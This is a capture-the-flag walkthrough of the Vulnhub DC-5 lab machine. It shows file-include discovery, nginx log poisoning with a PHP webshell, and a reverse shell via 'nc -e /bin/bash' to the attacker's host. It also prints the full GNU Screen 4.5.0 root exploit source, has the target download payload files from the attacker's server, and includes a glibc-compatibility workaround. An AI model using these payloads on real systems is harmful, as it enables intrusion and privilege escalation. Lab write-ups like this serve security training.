
Vulnhub box walkthrough - DC5

Contents

    • Flag
    • Summary

The walkthrough includes fixing the `version `GLIBC_2.34' not found` error that comes up when running the Screen 4.5.0 exploit PoC.

└─# arp-scan -l | grep 08:00:27:a0
192.168.1.101   08:00:27:a0:90:d4       PCS Systemtechnik GmbH
└─# nmap -Pn -p- -A 192.168.1.101 -o nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 16:10 CST
Nmap scan report for 192.168.1.101
Host is up (0.00027s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38260/tcp   status
|   100024  1          43672/tcp6  status
|   100024  1          46899/udp6  status
|_  100024  1          48339/udp   status
38260/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:A0:90:D4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds
└─# dirsearch -u http://192.168.1.101
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Vulnhub/DC5/reports/http_192.168.1.101/_25-02-12_16-14-03.txt

Target: http://192.168.1.101/

[16:14:03] Starting:
[16:14:16] 200 -    4KB - /contact.php
[16:14:17] 301 -  184B  - /css  ->  http://192.168.1.101/css/
[16:14:19] 200 -    6KB - /faq.php

# footer.php turned up, and its output changes on every refresh; thankyou.php, which the Contact form on the home page redirects to, shows the same changing footer, so thankyou.php almost certainly includes a file chosen by a parameter
[16:14:20] 200 -   17B  - /footer.php
[16:14:21] 301 -  184B  - /images  ->  http://192.168.1.101/images/
[16:14:21] 403 -  570B  - /images/
[16:14:38] 200 -  852B  - /thankyou.php

Task Completed

Brute-force the name of the include parameter with Burp Intruder; the burp.txt wordlist from the paramDict project is enough. Use a file that definitely exists on the box as the value and watch for the one response whose length differs.

The parameter turns out to be file.

First read the nginx configuration: http://192.168.1.101/thankyou.php?file=/etc/nginx/nginx.conf

Both the access log (access_log) and the error log (error_log) are enabled.

Look at the error log first: http://192.168.1.101/thankyou.php?file=/var/log/nginx/error.log

Each error entry records the request URL and the Referer header, so anything we put in those fields lands in a file we can include.

Trying to plant the webshell from the browser fails: the browser percent-encodes < and > in the URL, so the log line contains %3C?php instead of a PHP open tag and PHP never executes it.

Sending the same request from Burp Repeater (raw bytes, nothing encoded) plants it.

Include the log again to confirm the payload executes.

Reverse shell

Start the listener first, then fire the request from Burp with nc -e /bin/bash 192.168.1.99 8888 (the -e flag needs a netcat build that supports it; the one on DC-5 does).

└─# nc -lvvp 8888                                                                                                                                                                                     
listening on [any] 8888 ...
192.168.1.101: inverse host lookup failed: Unknown host
connect to [192.168.1.99] from (UNKNOWN) [192.168.1.101] 36679
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-5:~/html$ 

Privilege escalation

www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

exim does not give full root here, so screen is the way in: the setuid binary is literally named /bin/screen-4.5.0, and GNU Screen 4.5.0 has a known local root bug.

└─# searchsploit --id screen
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                      |  EDB-ID
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation                                                                                                                       | 41154

└─# searchsploit -p 41154
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
    Codes: N/A
 Verified: True
File Type: Bourne-Again shell script, ASCII text executable

┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/Vulnhub/DC5/screen.sh     

┌──(root㉿kali)-[~]
└─# cd Vulnhub/DC5/           

# start an HTTP server to serve the files to the target
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# python -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...

└─# cat screen.sh 
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Create the two source files from the script's contents

┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim libhax.c
	contents
		#include <stdio.h>
		#include <sys/types.h>
		#include <unistd.h>
		__attribute__ ((__constructor__))
		void dropshell(void){
		    chown("/tmp/rootshell", 0, 0);
		    chmod("/tmp/rootshell", 04755);
		    unlink("/etc/ld.so.preload");
		    printf("[+] done!\n");
		}

┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim rootshell.c
	contents
		#include <stdio.h>
		int main(void){
		    setuid(0);
		    setgid(0);
		    seteuid(0);
		    setegid(0);
		    execvp("/bin/sh", NULL, NULL);
		}

# compile (the implicit-declaration warnings below come from the missing #include <sys/stat.h> and <unistd.h>; they are only warnings here, but GCC 14 and later reject implicit declarations, so add the headers if your compiler refuses)
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# gcc -fPIC -shared -ldl -o libhax.so libhax.c                                                                                                                                                      
libhax.c: In function 'dropshell':
libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~

┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# gcc -o rootshell rootshell.c
rootshell.c: In function 'main':
rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function 'execvp' expecting 2 [-Wbuiltin-declaration-mismatch]


┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# ls 
arp-scan.txt  libhax.c  libhax.so  nmap.txt  reports  rootshell  rootshell.c  screen.sh

# delete the .c files
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# rm *.c                                                                                                                                                                                            

┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# ls                                                                                                                                                                                                
arp-scan.txt  libhax.so  nmap.txt  reports  rootshell  screen.sh

┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# cat -n screen.sh                                                                                                                                                                                  
     1  #!/bin/bash
     2  # screenroot.sh
     3  # setuid screen v4.5.0 local root exploit
     4  # abuses ld.so.preload overwriting to get root.
     5  # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
     6  # HACK THE PLANET
     7  # ~ infodox (25/1/2017)
     8  echo "~ gnu/screenroot ~"
     9  echo "[+] First, we create our shell and library..."
    10  cat << EOF > /tmp/libhax.c
    11  #include <stdio.h>
    12  #include <sys/types.h>
    13  #include <unistd.h>
    14  __attribute__ ((__constructor__))
    15  void dropshell(void){
    16      chown("/tmp/rootshell", 0, 0);
    17      chmod("/tmp/rootshell", 04755);
    18      unlink("/etc/ld.so.preload");
    19      printf("[+] done!\n");
    20  }
    21  EOF
    22  gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
    23  rm -f /tmp/libhax.c
    24  cat << EOF > /tmp/rootshell.c
    25  #include <stdio.h>
    26  int main(void){
    27      setuid(0);
    28      setgid(0);
    29      seteuid(0);
    30      setegid(0);
    31      execvp("/bin/sh", NULL, NULL);
    32  }
    33  EOF
    34  gcc -o /tmp/rootshell /tmp/rootshell.c
    35  rm -f /tmp/rootshell.c
    36  echo "[+] Now we create our /etc/ld.so.preload file..."
    37  cd /etc
    38  umask 000 # because
    39  screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
    40  echo "[+] Triggering..."
    41  screen -ls # screen itself is setuid, so...
    42  /tmp/rootshell
# delete lines 1-36 (the compile steps) so the script only contains the trigger; libhax.so and rootshell are built on Kali and copied over
┌──(root㉿kali)-[~/Vulnhub/DC5]
└─# vim screen.sh 
	contents
		cd /etc
		umask 000 # because
		screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
		echo "[+] Triggering..."
		screen -ls # screen itself is setuid, so...
		/tmp/rootshell

Download the three files into /tmp on the target

www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/screen.sh
wget http://192.168.1.99:9999/screen.sh
converted 'http://192.168.1.99:9999/screen.sh' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/screen.sh' (UTF-8)
--2025-02-13 19:44:44--  http://192.168.1.99:9999/screen.sh
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 190 [text/x-sh]
Saving to: 'screen.sh'

screen.sh           100%[=====================>]     190  --.-KB/s   in 0s     

2025-02-13 19:44:44 (44.8 MB/s) - 'screen.sh' saved [190/190]

www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/libhax.so
wget http://192.168.1.99:9999/libhax.so
converted 'http://192.168.1.99:9999/libhax.so' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/libhax.so' (UTF-8)
--2025-02-13 19:45:08--  http://192.168.1.99:9999/libhax.so
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15528 (15K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[=====================>]  15.16K  --.-KB/s   in 0.01s  

2025-02-13 19:45:08 (1.51 MB/s) - 'libhax.so' saved [15528/15528]

www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/rootshell
wget http://192.168.1.99:9999/rootshell
converted 'http://192.168.1.99:9999/rootshell' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/rootshell' (UTF-8)
--2025-02-13 19:45:17--  http://192.168.1.99:9999/rootshell
Connecting to 192.168.1.99:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16168 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[=====================>]  15.79K  --.-KB/s   in 0s     

2025-02-13 19:45:17 (505 MB/s) - 'rootshell' saved [16168/16168]

www-data@dc-5:/tmp$ ls
ls
libhax.so  rootshell  screen.sh

Make the script executable and run it (chmod +x would be enough; 777 is just habit)

www-data@dc-5:/tmp$ chmod 777 screen.sh
chmod 777 screen.sh
www-data@dc-5:/tmp$ ./screen.sh
./screen.sh
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

/tmp/rootshell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /tmp/rootshell)

# Normally a root shell comes back here. The "cannot be preloaded" warning is expected: the first line of ld.so.preload is screen's own output, the loader reports it and ignores it, and it still loads /tmp/libhax.so (the "[+] done!" comes from the library's constructor). The real failure is the last line: rootshell was linked on Kali against a newer glibc, the target's libc.so.6 has no GLIBC_2.34 symbol version, and the binary cannot even start.
www-data@dc-5:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Quoting a passage from another writer's article:

The error occurs because GLIBC_2.34 does not exist in the target environment.
Because the shell you get from a reverse shell is awkward to work in, most people compile everything on their own host and only then transfer the files to the target, which is more convenient.

But when rootshell.c is compiled with gcc on your own Kali host, if your host's GLIBC version is fairly new while the DC-5 target's is older, you get the error above.

(Copyright notice attached to the quoted post: original work of its author under CC 4.0 BY-SA; reproduction must include the source link and this notice.)
Source: https://blog.csdn.net/weixin_73904941/article/details/142856475
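A pre-flight check for exactly this problem, as an added Python example that is not part of the original write-up or the quoted post. It scans a binary for the GLIBC_x.y version strings it references (the same ones `objdump -T` lists) and compares the highest one with the target's glibc, which you read off `ldd --version` on the box. The glibc 2.19 figure used in the test is an assumption based on the gcc 4.9 and nginx 1.6.2 versions seen on DC-5 (Debian 8), and the sample bytes are constructed, not a real ELF.

```python
"""Pre-flight check for the `version GLIBC_2.34 not found` problem (added
example; not from the original write-up). A binary linked on a current Kali
references versioned glibc symbols such as GLIBC_2.34; the loader on an old
target (assumed here: glibc 2.19 on Debian 8) aborts with exactly the message
shown above. The scan below looks for the GLIBC_x.y version strings in the
ELF (the same ones `objdump -T` lists); it is a byte scan, not a parse of the
.gnu.version_r section, so use `readelf -V` if you need the authoritative list."""
import re

_GLIBC_RE = re.compile(rb"GLIBC_(\d+)\.(\d+)(?:\.(\d+))?")


def glibc_versions_needed(elf_bytes):
    """Sorted list of GLIBC_x.y versions referenced in the binary, as int tuples."""
    found = {tuple(int(p) for p in m.groups() if p is not None)
             for m in _GLIBC_RE.finditer(elf_bytes)}
    return sorted(found)


def max_glibc_needed(elf_bytes):
    """Highest version required; None for static or non-glibc binaries."""
    versions = glibc_versions_needed(elf_bytes)
    return versions[-1] if versions else None


def parse_version(text):
    """'2.19' or 'ldd (Debian GLIBC 2.19-18+deb8u10) 2.19' -> (2, 19)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"no glibc version in {text!r}")
    return tuple(int(p) for p in m.groups() if p is not None)


def will_load(elf_bytes, target_glibc):
    """True if a target running glibc `target_glibc` can load this binary."""
    needed = max_glibc_needed(elf_bytes)
    return needed is None or needed <= parse_version(target_glibc)


def fmt(version):
    """(2, 34) -> 'GLIBC_2.34'."""
    return "GLIBC_" + ".".join(str(p) for p in version)


def check_file(path, target_glibc):
    """Report and return whether `path` will load on the target; run it before wget'ing the file over."""
    with open(path, "rb") as f:
        data = f.read()
    needed = max_glibc_needed(data)
    ok = will_load(data, target_glibc)
    what = fmt(needed) if needed else "no versioned glibc symbols (static?)"
    verdict = "OK" if ok else "will NOT load: rebuild with `gcc -static` or compile on the target"
    print(f"{path}: needs {what}, target has glibc {target_glibc} -> {verdict}")
    return ok


if __name__ == "__main__":
    import sys
    # usage: python3 glibc_check.py rootshell 2.19   (2.19 from `ldd --version` on the target)
    sys.exit(0 if check_file(sys.argv[1], sys.argv[2]) else 1)
```

When the check fails you have two fixes: compile on the target, which is what the write-up ends up doing, or build on Kali with `gcc -static -o rootshell rootshell.c` so the binary carries its own libc and no symbol version is required at all. The static build avoids the whole cc1/PATH detour that follows, at the cost of a larger file.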

So we compile rootshell.c on the target instead.

www-data@dc-5:/tmp$ wget http://192.168.1.99:8888/rootshell.c
wget http://192.168.1.99:8888/rootshell.c
converted 'http://192.168.1.99:8888/rootshell.c' (ANSI_X3.4-1968) -> 'http://192.168.1.99:8888/rootshell.c' (UTF-8)
--2025-02-14 11:46:47--  http://192.168.1.99:8888/rootshell.c
Connecting to 192.168.1.99:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 135 [text/x-csrc]
Saving to: 'rootshell.c'

rootshell.c         100%[=====================>]     135  --.-KB/s   in 0s     

2025-02-14 11:46:47 (33.0 MB/s) - 'rootshell.c' saved [135/135]

www-data@dc-5:/tmp$ gcc -o rootshell rootshell.c
gcc -o rootshell rootshell.c

# gcc cannot find its compiler proper, cc1
gcc: error trying to exec 'cc1': execvp: No such file or directory

# check whether it exists on the box at all
www-data@dc-5:/tmp$ find / -name cc1 2>/dev/null
find / -name cc1 2>/dev/null
/usr/lib/gcc/x86_64-linux-gnu/4.9/cc1

# check whether PATH covers gcc's install directory
www-data@dc-5:/tmp$ echo $PATH
echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.

# add it to PATH for this shell only (the author's fix; gcc also documents COMPILER_PATH as the variable it searches for sub-programs such as cc1, so pointing that at /usr/lib/gcc/x86_64-linux-gnu/4.9 is the direct alternative, not tried here)
www-data@dc-5:/tmp$ export PATH="/usr/lib:$PATH"
export PATH="/usr/lib:$PATH"

# compiles cleanly this time
www-data@dc-5:/tmp$ gcc -o rootshell rootshell.c
gcc -o rootshell rootshell.c
www-data@dc-5:/tmp$ ls
ls
rootshell  rootshell.c

# run the exploit again with the locally built rootshell
www-data@dc-5:/tmp$ ./screen.sh
./screen.sh
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

Flag

# id
id

# privilege escalation to root succeeded
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# find / -name *flag.*
find / -name *flag.*
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/root/thisistheflag.txt
# cat /root/thisistheflag.txt
cat /root/thisistheflag.txt



888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 
                                                                                          
                                                                                          


Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

Summary

Inspect and test every page carefully; any of them may be the way in.

Don't panic at an error; work through it step by step.


http://www.kler.cn/a/545983.html
